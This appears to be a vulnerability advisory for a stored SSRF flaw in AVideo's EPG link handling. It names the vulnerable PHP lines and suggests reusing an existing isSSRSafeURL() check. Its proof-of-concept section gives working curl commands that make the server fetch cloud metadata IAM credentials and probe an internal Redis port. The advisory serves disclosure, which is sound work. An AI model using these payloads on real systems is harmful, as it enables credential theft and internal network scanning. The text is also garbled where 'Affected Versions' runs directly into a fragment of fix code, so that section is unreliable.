## Vulnerability Overview **Vulnerability Name**: Stored SSRF via Video EPG Link Missing isSSRSafeURL() Validation **CVE ID**: CVE-2024-34740 **Severity**: 6.5/10 (Medium) **Weakness**: CWE-918 (Server-Side Request Forgery) The AVideo platform's EPG (Electronic Program Guide) link feature contains a stored SSRF vulnerability. Authenticated users with upload permissions can store arbitrary URLs, which the server fetches on every EPG page visit. URLs are only validated using PHP's `FILTER_VALIDATE_URL`, which accepts URLs pointing to internal addresses (e.g., `http://127.0.0.1`, `http://169.254.169.254`, etc.). Although the codebase contains an `isSSRSafeURL()` function designed to prevent SSRF, it is not invoked during the EPG link processing flow. --- ## Impact Scope - **Affected Versions**: url)) { throw new \RuntimeException('URL blocked by SSRF protection'); } ``` Reuse the existing SSRF protection function already applied to other code paths. --- ## Vulnerable Code Locations **EPG Link Storage** (`objects/videoAddNew.json.php:119`): ```php $obj->setEpg_link($_POST['epg_link']); ``` **EPG Data Parsing** (`objects/EpgParser.php:355`): ```php $this->content = @file_get_contents($this->url); ``` --- ## POC Code ### 1. Targeting Cloud Metadata Service ```bash curl -b "PHPSESSID=USER_SESSION" \ -X POST "https://your-avideo-instance.com/objects/videoAddNew.json.php" \ -d "title=TestVideo&epg_link=http://169.254.169.254/latest/meta-data/iam/security-credentials/" ``` ### 2. Triggering EPG Parser ```bash curl -b "PHPSESSID=USER_SESSION" \ "https://your-avideo-instance.com/plugin/Live/view/Live_schedule/?video_id=VIDEO_ID" ``` ### 3. Scanning Internal Ports ```bash # Scan an internal service curl -b "PHPSESSID=USER_SESSION" \ -X POST "https://your-avideo-instance.com/objects/videoAddNew.json.php" \ -d "title=TestVideo&epg_link=http://127.0.0.1:6379" ```